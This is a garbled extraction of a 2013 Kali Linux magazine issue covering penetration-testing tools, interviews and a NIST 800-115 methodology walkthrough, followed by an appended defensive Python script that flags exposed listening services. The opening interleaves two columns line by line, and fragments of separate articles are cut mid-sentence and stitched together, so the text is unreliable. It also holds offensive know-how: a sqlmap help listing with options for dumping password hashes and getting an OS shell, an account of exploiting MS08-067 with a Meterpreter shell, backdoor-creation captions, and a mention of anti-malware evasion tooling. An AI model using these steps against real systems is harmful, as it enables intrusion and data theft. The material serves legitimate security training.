The first step of the Metasploit scan is a Discov- ministrator's toolbox. This researcher has used
ery phase, which initiates an NMap -A T4 IP-range NMap for mapping networks, checking for running
test (Figure 9) and then proceeds through NetBI- services, troubleshooting connectivity problems
OS probes and about 100 other tests. and checking network routes available for about
After the Discovery phase, you have an analy- ten years (Figure 10).
sis of hosts, ports open, services, vulnerabilities The basic command-set is pretty easy to learn,
and data captured. In the test network there were and the documentation is very good. The only
5 hosts and 27 services running on open ports, but thing NMap won't do is map a network by NetBIOS
no listed vulnerabilities. Rest assurred, the aver- names and return IP addresses.
age LAN would have a few vulnerabilities.
Nmap
http://nmap.org/
Review
The OWASP Zed Attack Proxy needs Java7. The
interface is simple and works pretty quickly. The
image below shows a spidering attack on a site.
There are over 3400 URIs on the site (Figure 13).
You can also send tailored HTTP requests and
responses with OWASP-ZAP.
Figure 12. ZenMap

SQLmap
http://sqlmap.org/
Description (from the project site)
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database

sqlmap.py -h

Options:
  -h, --help            Show basic help message and exit
  -hh                   Show advanced help message and exit
  --version             Show program's version number and exit
  -v VERBOSE            Verbosity level: 0-6 (default 1)

  Target:
    At least one of these options has to be provided to set the target(s)

    -u URL, --url=URL   Target URL (e.g. "www.target.com/vuln.php?id=1")
    -g GOOGLEDORK       Process Google dork results as target URLs

  Request:
    These options can be used to specify how to connect to the target URL

    --data=DATA         Data string to be sent through POST
    --cookie=COOKIE     HTTP Cookie header
    --random-agent      Use randomly selected HTTP User-Agent header
    --proxy=PROXY       Use a proxy to connect to the target URL
    --tor               Use Tor anonymity network
    --check-tor         Check to see if Tor is used properly

  Injection:
    These options can be used to specify which parameters to test for,
    provide custom injection payloads and optional tampering scripts

    -p TESTPARAMETER    Testable parameter(s)
    --dbms=DBMS         Force back-end DBMS to this value

  Detection:
    These options can be used to customize the detection phase

  Enumeration:
    These options can be used to enumerate the back-end database
    management system information, structure and data contained in the
    tables. Moreover you can run your own SQL statements

    -a, --all           Retrieve everything
    -b, --banner        Retrieve DBMS banner
    --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --passwords         Enumerate DBMS users password hashes
    --tables            Enumerate DBMS database tables
    --columns           Enumerate DBMS database table columns
    --schema            Enumerate DBMS schema
    --dump              Dump DBMS database table entries
    --dump-all          Dump all DBMS databases tables entries
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table to enumerate
    -C COL              DBMS database table column to enumerate

  Operating system access:
    These options can be used to access the back-end database management
    system underlying operating system

    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an OOB shell, meterpreter or VNC

  General:
    These options can be used to set some general working parameters

    --batch             Never ask for user input, use the default behaviour
    --flush-session     Flush session files for current target
EXTRA
Interview with Demóstenes Zegarra Rodríguez
Demóstenes Zegarra Rodríguez is a Ph.D. student in Electronic Systems at University of Sao Paulo, with solid knowledge in Telecommunication Systems and Computer Science based on 13 years of professional experience in important companies such as Nokia, Microsoft, Celltick, Telefonica.
Since when have you been using Kali and what convinced you to it?
I have used the BackTrack Linux since 2009 and nowadays I am using Kali because of the security and testing tools association, with more than 300 penetration testing tools, including vulnerability analysis, web applications, password attacks, wireless attacks, exploitation tools, sniffing and spoofing, reverse engineering, stress testing, hardware hacking, forensic, and others.

What are the positive and negative aspects of Kali you noticed?
The positive aspects are that Kali has common tools as Wireshark, nmap until VoIP tools as rtpflood and sipmyknife. Then, Kali can be considered as a penetration testing platform that provides many features.
I have installed Kali Linux on some computers with no automatic support to some hardware such as video card, but it can be a little common in some Debian-based distributions.

Does Kali serve you for private or professional purposes?
I use Kali Linux for academic studies, to analyze tool performances, such as attack time and efficiency using different wireless security protocols. As an example, you can see a case study at the final of this interview.

What are you using it for?
In the present, I am analyzing the time period to crack wireless passwords and their computational efforts. As a future work, I pretend to study the forensic tools of Kali Linux, because the focus of the distribution is the penetration testing tools, so I want to study if Kali Linux is a complete solution for forensic purposes too.

Which methods do you most frequently use?
I am using a trivial wireless method with the tools aircrack-ng, aireplay-ng, airmon-ng, and airodump-ng; but, in the next studies I will pretend to use all the forensic tools through the Forensic Boot option to the operating system, using more than one method.

What difficulties might surprise a new user? What can you advise them?
The difficulties are only drivers support and the ability to work with the penetration tools, because in many cases the users have to use the association of more than one tool to have good results to discover vulnerabilities of softwares and hardwares.

What can you say about the basic tools?
The basic tools are extensively used by network and system administrators, as nmap, Wireshark, chroot, and in a lot of distributions the tools are
EXTRA 05/2013(16)
In this article we will try to shed some light on how Kali can be used with a penetration testing methodology to streamline the penetration testing process and create a stronger deliverable for the client. While Kali provides a categorization of tools we will take this a step further and provide clear mapping against a standard penetration testing methodology. Along the way we will look at many tools from a high level as they pertain to the steps within the methodology. In this article we will look at the tools at a high level and focus specifically on how to utilize the tools within a structured penetration test. We will also visit a few of our favorite tools we like to use during our penetration tests.

The Methodology
We can't begin an article about mapping Kali to a penetration testing methodology without first selecting the methodology. When it comes to penetration testing methodologies you can basically narrow the field down to three. These are:

Penetration Testing Execution Standard (PTES): Standard for penetration testing execution along with technical guidelines.
National Institute of Standards and Technology: Guide to Security Testing and Assessment (NIST 800-115): Guide for conducting technical security assessments. Contains guidance on techniques and methods that an assessor should use when performing an Information Security Assessment.

While all three are good methodologies we find that PTES and NIST 800-115 provide a bit more flexibility during our penetration tests. Also, the methodologies more closely align with what's taught in security course curriculum such as SANS. For this article we will be using NIST 800-115. Both PTES and NIST are similar so it should
Reporting
Lastly, we need to take all the data from various tools as well as our manual observations and screenshots to create a report. A typical penetration test report will have two audiences: a non-technical audience that needs enough details to understand the problem and make management-level decisions to address the risk (think resources and budget), and the technical audience who will be responsible for mitigating the findings (Table 12).

Figure 3. Dradis Initialization
Discovery
We decide to kick off the Discovery phase by running TheHarvester. TheHarvester is written by Christian and allows us to collect information about a target organization from a variety of sources including Google, Facebook, LinkedIn, spoke, etc. Let's take a look at TheHarvester a bit closer (Figure 5).

Figure 5. TheHarvester Options

The screenshot shows TheHarvester options and some example usage. In the next example we'll run TheHarvester against our target domain querying Bing. We also want to ensure we limit our return results to 100. The command and its output would look something like Figure 6.

Figure 6. TheHarvester Output

With these options selected TheHarvester will query Bing for our domain looking for email addresses as well as additional linked domains. The -n and -t options tell TheHarvester to perform reverse DNS lookups on the IP range identified for the domain queried as well as expand the search for our domain across all top level domains. For example, if our domain was nbc.com it would attempt to find domains such as nbc.ca, nbc.biz, etc.

TheHarvester can pull together a significant amount of information that we can use during the scanning phase of Discovery, but in this case we decide to utilize some additional tools to further our Information Gathering efforts prior to moving on to scanning.

At this point we decide that we want to interrogate DNS a bit more with the information gathered from TheHarvester. Because of its features we have chosen to run our domains through Fierce. Fierce can initiate DNS zone transfer attempts as well as perform bruteforce lookups against DNS. While TheHarvester can perform DNS bruteforcing as well, Fierce contains added functionality

Figure 7. Fierce Example
Figure 8. Fping Example
Figure 9. Hping3 Example
Attack
Gaining Access
Now that we have identified several vulnerabilities as well as the likelihood of exploitation we decide to try and exploit the MS08-067 vulnerability identified with our nmap scan. We leverage the Metasploit framework to begin our initial attack vector. Metasploit is very powerful and could be used for various phases within our methodology. That being said, Kali provides many options that can be leveraged to meet our testing objectives. In this particular case Metasploit provides a perfect vehicle to exploit this particular vulnerability.

Prior to launching Metasploit we need to start up the Postgres database and the Metasploit server component. These are not configured to start up on boot by default in Kali (Figure 14).

Next, we launch the Metasploit console with the msfconsole command. After doing an initial search we discover that Metasploit does have an exploit for MS08-067. We configure the exploit with the bind shell Meterpreter payload to make us work a bit harder for our objectives. Once all the options are configured we run the exploit using the exploit command (Figure 15).

Success! We have exploited our vulnerability and have gained access to our system.

Figure 11. NMAP Script Options
Figure 12. NMAP Script Directory
Figure 13. NMAP smb-check-vulns Output Against Target Host
Reporting
Documentation is critical to the success of the penetration test. This can be performed through screen-shots or tool output. Since we are using Dradis we ensure that we output all tools to text or XML files as well as take screen-shots where tool output is less efficient.

Some tools provide self-documenting features. Take Metasploit for instance. It provides a database that captures output from various tools as you progress through your penetration test. In addition, Meterpreter has the screenshot feature that allows us to take a screen capture of the victim's desktop. Here is a screenshot from our previously compromised host (Figure 24).

Once this data is input or imported into Dradis we can output reports in HTML and Word documents. The screen-shot below should give you the idea (Figure 25).

Conclusion
Kali is a valuable resource when performing penetration testing. Sometimes the tools can seem a bit overwhelming. Leveraging a methodology such as NIST 800-115 will bring some consistency and continuity to your penetration tests.

While we did not cover every tool on the distribution nor demonstrate all mapped tools in our example, we hope this brief introduction will help you formulate a plan of attack when using Kali on engagements, so that you bring a better deliverable to your clients.

Figure 20. Atftpd Startup on Kali For Tool Delivery
Jeff Weekes
Jeff has over 15 years of IT and security services experience. He currently performs penetration testing, web application security assessment, security code review, security strategy, security research, and incident / forensic / network forensic response services for government contractors, financial institutions, retail services, medical device manufacturers, contact centers, cloud solution companies, and SaaS service companies.

Carlos Villalba
Carlos has over 17 years of solid IT. He has extensive experience designing, developing, managing and implementing IT security solutions with their training and security components in compliance with IT security standards and best practices. Carlos's experience provides a unique combination of skills and experience. Carlos merged his experience into the academic world by designing and delivering instruction and training at the graduate, undergraduate and professional level while being an active IT security consultant. His experience includes Compliance Assessments, Pen-testing, IT security projects, DIACAP Training Design, Oracle database performance, Open Source Solutions for migration of Learning Management Systems and Database Management Systems. Expert knowledge level of Windows based platforms and Red Hat based systems. Solid experience with Active Directory, VPN, SharePoint, Oracle RDBMS, MS SQL, web application security, DNS, encryption, scripting, ISO17799 and PKI. He has provided services to the Air Force Research Labs, Credit Unions, Universities, Manufacturing companies and small business.

Figure 21. Backdoor Account Creation on Target Host
Figure 22. SBD Backdoor Setup On Target Host
Figure 23. SBD Kali Client Connection To Target Host
Figure 24. Meterpreter Screenshot Example
Figure 25. Dradis Export Example
Interview with Jeff Weekes
Especially for you, we have interviewed a pentesting specialist, Jeff Weekes, who has over 15 years of IT and security services experience!

Kali is a superb tool for security experts and pentesters. We would be interested to know how the tools are chosen and how the team members work together to make the distro being updated?
This is a great question! We often have to balance tool choices with functionality, cost, and resource experience. After all we are inevitably in business to make money.
We like open-source tools as they provide a level of visibility into what's really happening. In addition, it allows us to customize and script the tools in a variety of ways. Most notably when it comes to managing tool output for reporting.
In the end we leverage both open-source and commercial tools. Here is a quick run down of some of the tools we use in our war chest.

Kali -> Can't live without it!!
Nessus
Qualys
Metasploit Community / Professional
Burpsuite
Wireshark
Customized scripts, shellcode, and command-control applications to evade anti-malware controls.

Keeping tools updated can be a real challenge. We decided long ago that the best method to ensure consistent delivery is dedicated laptops for assessments and penetration testing. Prior to an engagement we perform updates on the various tools. Also, at the end of each engagement we securely delete the laptops, re-install baseline images, and then update tools. In the near future we will be rolling customized Kali images for our assessments. This will allow us to bake in our update routines, leverage snapshots, and lastly minimize the need for additional hardware.

How are the comments of the users treated by the team members who work on Kali when these users make suggestions or report bugs?
We take our clients' feedback very seriously. In the event that we discover issues with what various tools identify we immediately investigate the problem. Because many of the tools are open-source we can take a look at the underlying code. If we identify the problem we attempt to notify the various tool owners through their bug reporting channels. We will also update our team members so they are aware of the problem and can leverage different tools or techniques to ensure accuracy of our testing.
monitoring staff. It's a good idea to have a strategy on how to deal with data spill issues because they will eventually come up. We usually recommend data masking prior to log entry if the technology supports it or aggressive data scrubbing on log files. Remember that the latter may create log integrity issues as you have altered the logs.
The second major issue is really understanding the application you are trying to protect. If you are not a web application developer you may need to become one or at least understand how the application works at an in-depth level. You also need to get the development team involved early and often in the process to ensure successful buy-in and deployment.

What are the most important steps he/she would recommend for securing a web server or web application?
The most important step in my mind is input validation. I can't say it enough. It's critical that your development teams understand the importance of secure coding techniques and especially input validation. This can be a difficult challenge given most companies focus on application features and time to market. Web Application Firewalls can help, but nothing beats securely developing the code in the first place. Remember they don't and shouldn't re-invent the wheel. There are some great frameworks and libraries out there that can assist. Check out several OWASP projects such as Enterprise Security API (ESAPI) for additional details.

Does the platform produce potential threats? Do you have any precautions for the future users?
Kali does produce some potential threats. Namely around passwords and the potential services that get enabled during the course of penetration testing. To limit both your and your clients' exposure you should ensure the version/tools are updated, password protected (AKA Change the Default), and leverage a host firewall such as iptables. In addition, we recommend encrypting the drive where your artifacts reside as well as scrubbing your penetration testing boxes or images after each engagement. You don't want to end up on the news for exposing your customers' data. Especially, data collected during the course of a penetration test.

Any idea on what can we expect from the IT Security software developers? Are there any gaps that need to be filled?
I'm excited to see where Dradis goes with their SaaS based solution as well as the evolution of tools like MagicTree. I believe there is a real gap around tools for reporting and data management. Especially, with RedTeam engagements that involve multiple penetration testers.

Do your friends, including IT specialists, also have a positive opinion about Kali?
Most of the people in my network have made the switch to Kali and have nothing but good things to say.

Have you read our first issue of Kali Linux? Which of the methods described therein are you most interested in?
I did read the first Kali issue. I have to say that I enjoyed all the articles. My favorite was Kali Linux on a Raspberry Pi by Scott Cristie. We've been looking at how we could deploy Kali on a small form factor for covert engagements and this article will give us a jump start on that endeavor.

What do you think about the future of pentesting?
I think penetration testing has a bright future. Technology is moving at an incredibly fast pace. Internet enabled smartmeters, cars, and medical devices brings on new challenges and threats. If the past is any indication then penetration test will be in demand. This shift in technology will require new skillsets and techniques that penetration testers will need to acquire in order to be successful. I'm also excited about bug bounty programs coming from companies out of Silicon Valley as well as crowdsource initiatives from companies such as Synack. There is some unique opportunity with these initiatives for freelance penetration testers to help strengthen the security postures of these companies and products while making some additional money.
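The precautions in Jeff Weekes's answer above (keep tools updated, change default passwords, run a host firewall, and watch the services that get enabled during an engagement) come down to knowing what your own box is listening on. As an added example that is not part of the interview or the magazine, the script below parses the output of `ss -lntup` (iproute2's listing of listening TCP and UDP sockets with process names) and flags every service bound to all interfaces that is not on an explicit allow list; the embedded output is a constructed sample, and its process names, PIDs and ports are invented for illustration.

```python
"""Flag services listening on all interfaces of a Kali box.

Added example for the precautions discussed in the interview; not code from
the interview or the magazine. The `ss -lntup` output below is a constructed
sample with invented processes and PIDs.
"""
import re

# Constructed sample of `ss -lntup` output on a test box after an engagement.
# Column layout follows iproute2: Netid State Recv-Q Send-Q Local Peer Process.
SAMPLE_SS_OUTPUT = """\
Netid State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
tcp   LISTEN 0      128          0.0.0.0:22         0.0.0.0:*     users:(("sshd",pid=812,fd=3))
tcp   LISTEN 0      128        127.0.0.1:5432       0.0.0.0:*     users:(("postgres",pid=901,fd=5))
tcp   LISTEN 0      511          0.0.0.0:3790       0.0.0.0:*     users:(("nginx",pid=1130,fd=6))
tcp   LISTEN 0      128             [::]:80            [::]:*     users:(("apache2",pid=1340,fd=4))
udp   UNCONN 0      0            0.0.0.0:69         0.0.0.0:*     users:(("atftpd",pid=1203,fd=4))
"""

# Local addresses that mean "every interface", for IPv4 and IPv6.
WILDCARDS = {"0.0.0.0", "*", "[::]", "::"}
PROC_RE = re.compile(r'"([^"]+)",pid=(\d+)')


def parse_ss(text):
    """Turn `ss -lntup` output into a list of socket dicts (header line skipped)."""
    entries = []
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 6:
            continue
        netid, state, local = fields[0], fields[1], fields[4]
        addr, port = local.rsplit(":", 1)       # keeps "[::]" intact for IPv6
        m = PROC_RE.search(line)
        entries.append({
            "proto": netid, "state": state, "addr": addr, "port": int(port),
            "process": m.group(1) if m else "",
            "pid": int(m.group(2)) if m else None,
        })
    return entries


def find_exposed(entries, allowed_ports=frozenset()):
    """Return network-reachable listeners that are not on the allow list.

    Sockets bound to loopback are ignored because only the box itself can
    reach them. Wildcard binds are the ones a host firewall must cover, or
    that should be stopped once the engagement step that needed them is over.
    """
    return [e for e in entries
            if e["addr"] in WILDCARDS and e["port"] not in allowed_ports]


def report(findings):
    """One human-readable line per finding."""
    return ["%s/%d (%s, pid %s) is listening on all interfaces"
            % (e["proto"], e["port"], e["process"] or "unknown", e["pid"])
            for e in findings]


if __name__ == "__main__":
    # On a real box replace the sample with:
    #   subprocess.run(["ss", "-lntup"], capture_output=True, text=True).stdout
    exposed = find_exposed(parse_ss(SAMPLE_SS_OUTPUT), allowed_ports={22})
    for line in report(exposed):
        print(line)
```

Run with only SSH on the allow list, the sample flags the Metasploit web interface on 3790, Apache on 80 and the atftpd tool-delivery server on 69, while the loopback-only Postgres socket is ignored; that list is exactly what the iptables rules or a post-engagement scrub have to account for.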